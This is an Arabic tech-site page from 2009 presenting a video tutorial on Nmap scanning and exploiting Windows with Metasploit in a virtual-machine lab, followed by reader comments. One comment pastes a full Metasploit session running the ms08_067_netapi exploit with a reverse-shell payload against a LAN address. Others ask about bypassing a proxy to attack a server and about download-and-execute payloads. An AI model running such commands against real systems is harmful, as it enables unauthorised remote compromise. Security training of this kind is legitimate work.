| فيديو: اختراق نظام ويندوز باستخدام Nmap و Metasploit |
| الكاتب عبدالمهيمن |
| الأربعاء, 29 يوليو 2009 03:49 |
|
فيديو يشرح استخدام أداة Nmap لفحص المنافذ الموجودة بالجهاز وتحديد نوع النظام وكيفية استغلال احدى الثغرات الموجودة في مشروع ميتاسبلويت لاختراق نظام ويندوز عن بعد في مدة لا تزيد عن 5 دقائق.
شرح الفيديو:
التعليقات (27)
  أرسلت بواسطة: الرآيق في July 29, 2009
السلام عليكم
يعطيك العافيـه يا خوي على هذ الشرح فعلاً اداة Nmap ممتاز في كشف المنافذ المفتوحه في الجهاز
 أرسلت بواسطة: pal في July 29, 2009
يعطيك العافية على درس جميل
لاكن عندي سؤال طريقة تنجح فقط على شبكة داخلية
 أرسلت بواسطة: Zaid في July 29, 2009
شرح اكثر من رائع
طبعا مشروع الميتاسبلويت اكثر من رائع و الـmeterpreter اروع D: و منتظرين جديدك
 أرسلت بواسطة: L!nuxawi في July 29, 2009
ألف شكر أخوي عبدالمهيمن ,,, موضوع و شرح أكثر من رائع
"" أتمنى الإهتمام بجانب السيكيورتي و تأمين نظام اللينكس من جهه مستخدم سطح المكتب ""
 أرسلت بواسطة: Syntax في July 30, 2009
بارك الله فيك وزادك علم :)
لو قمت بعمل Pause للتصوير خلال تحميل الميتا , كنت ستوفر بعض الثواني :) جزاك الله خير , دمت بود ,,,
 أرسلت بواسطة: Mustafa Albazy في July 30, 2009
شرح بسيط جداً وجميل, ولكن ليس جميع الثغرات الموجودة يمكن تنفيذها البعض يمكن تنفيذها على جهاز احمد وعلى جهاز احمد لايمكن وهنا يأتي دور اختلاف نسخة الويندوز والتحديثات المركبة على النظام.
@ pal لاكن عندي سؤال طريقة تنجح فقط على شبكة داخلية تنفع على شبكات WAN/LAN
 أرسلت بواسطة: عبدالمهيمن في July 30, 2009
لأكون صريح معكم لم أجرب استغلال ثغرة خارج الشبكة المحلية لكني بنفس الوقت لا أجد ما يمنع استغلال الثغرة عن طريق الانترنت اذا توفرت الشروط التالية:
1. IP حقيقي للجهاز أي أننا نستطيع الوصول للجهاز والاتصال معه بشكل مباشر. 2. عدم وجود أنظمة حماية أو IDS يمنع استغالال الثغرة بشكل صحيح فكما نعلم في الانترنت اتصالنا يمر بعدة سيرفرات.. اذا وجد نظام حماية على سيرفر واحد فقط هذا سيؤدي لعدم استغلال الثغرة. @Syntax: بصراحة لم أكن أتصور أنه سيحتاج كل هذا الوقت.. كل ثانية أقول الآن سيعمل والآن سيظهر سطر الأوامر... حتى انتهت الـ 40 ثانية P: على كل حال لاتقلق ضغطت الفيديو بشكل جيد وأنقصت من دقته قليلا فحجمه لايزيد عن 10 ميغا.
 أرسلت بواسطة: Dz-Security في July 31, 2009
سوالي: هل التطبيق كان على جهاز وهمي او جهاز داخل شبكتك او جهاز مستهدف او غير ذلك ؟
و شكرا لك على الموضوع =)
أرسلت بواسطة: Mustafa Albazy في July 31, 2009
راجع الفيديو مرة اخرى, التطبيق تم على جهاز وهمي بواسطة الفرتوال بوكس.
 أرسلت بواسطة: مروان في August 01, 2009
الفيديو تم على جهاز وهمي و في الاعدادات يتصل بالشبكة "bridged" او "accés par pont
يعني الروتر يظن انه جهاز موجود فيزيائيا و لكنه وهمي
 أرسلت بواسطة: t4h3r في August 07, 2009
شرح هايل ومبسط جداً
بس انا عندى مشكلة لما بكتب Nmap -0 192.168.16.70 مثلاً النتيجة اللى بتظهر هى دى مع العلم ان الاى بى ده موجود وشغال فى الشبكه معايا
 أرسلت بواسطة: ICEMAN في August 25, 2009
هاي عبدو
ال ip اللي انت كتبته بسرعة من غير ماتبحث عنة اي انه وين عرفت هذا ال ip اللي طبقت عليه الشرح مع العلم اني اعلم مثل ماتكول بالشرح انه للنظام الوهمي كيف عرفت ip النظام الوهمي يعني انت تعرفه مسبقا ام هناك اوامر تمكننا من البحث عن ال ip في الشبكة وشكرا على الموضوع
أرسلت بواسطة: عبدالمهيمن في August 25, 2009
في الشرح أنا أفترض أني أقوم بـ Penetration Testing وقبل أن أصل لمرحلة تطبيق الثغرات قمت بعملية جمع المعلومات وفحصت نطاق الشبكة باستخدام Nmap وعرفت الأنظمة الموجودة, اصداراتها والمنافذ المفتوحة فيها. ثم بدأت بتطبيق الثغرات واستخدمت Nmap مرة أخرى في بداية الفيديو لأظهر كيف عرفت اصدار نظام التشغيل عن بعد, أتمنى أن تكون الصورة وضحت الآن...
 أرسلت بواسطة: عبد العزيز حسن في August 27, 2009
يا جماعه هي الفديوهات ممسوحه ولا هي المشكله عندي
..... انا مفيش ولا فديو شغال عندي
 أرسلت بواسطة: ZEZO في August 30, 2009
بارك الله فيك ياأخى
وانا مازلت مبتدىء فى عالم الشبكات والامان وحلمى ان اصبح محقق جرائم الكترونية ان شاء الله ( مع العلم انى مهندس اتصالات ) ورمضان مبارك على الجميع
 أرسلت بواسطة: sherif في September 21, 2009
السلام عليكم .. أولاً شكراً على الشرح الرائع.. ثانياً عندي سؤال: سيرفر يعمل ب Microsoft IIS أردت تطبيق بعض ثغرات الميتاسبلويت عليه لكنه يخرج لي رسالة Target not found فوجدت أنه يستخدم سيرفر Squid فهل يوجد طريقة لتخطي ذلك البروكسي؟
أرسلت بواسطة: عبدالمهيمن في September 22, 2009
اذا لم تكن تستطيع الاتصال المباشر بالنظام الذي تريد تنفيذ الثغرات عليه فلن تتمكن من استغلال الثغرات وتنفيذه بشكل صحيح.
 أرسلت بواسطة: عبد العزيز في November 03, 2009
يعطيك العافية اخوي فعلا بطل في شرحك
وفكرتك اكثر من رــأإئـعة تسلم ايديك عليها بالتوفيق يا غالي
 أرسلت بواسطة: احمد العتيبي في November 18, 2009
طبعا الاستغلالات تختلف من باي لود لباي لود اخر
انا ودي انك تشرح مجموعة من الباي لودات ويكون من ظمنها windows/dawnload_exec
 أرسلت بواسطة: S4udi h4ck في December 18, 2009
لاهنت اخوي ابي الاوامر اين اجدها .؟ البرنامج موجود بس الاوامر لاهنت مهي بموجوده اين اجدها
اخوك خالد njm@hotmail.com
 أرسلت بواسطة: glal في December 23, 2009
لقد ارسلت لك تعليقا عن شيء بخصوص الميتاسبلوت بمدونتك لا اريد طرحه هنا مره اخري حتي لا تمل مني ...ارجو الرد علي هنا او هناك
اريد اضافه شيء- بدأ فعلا هذا الموقع في التقدم والانتشار وبذلك علي ايدي محترفين امثالكم ارجو المحافظه علي التقدم وتحقيق تقدم اكثر شكراا
 أرسلت بواسطة: redbyte في February 05, 2010
ارجو المساعد في حل هذه المشكلة
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp PAYLOAD => generic/shell_reverse_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.1.247 RHOST => 192.168.1.247 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability... [*] Exploit completed, but no session was created. مع العلم اني وضعت ال LHOST ستعمل الكثير من الثغرات ولكن جميعها نفس الخطاء [*] Exploit completed, but no session was created. شو اعمل؟؟؟؟ وشكرا الك ع الشروحات الحلوة
أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |
اهنيك والله على الموضوع المميز
أستمر .. !
موفقين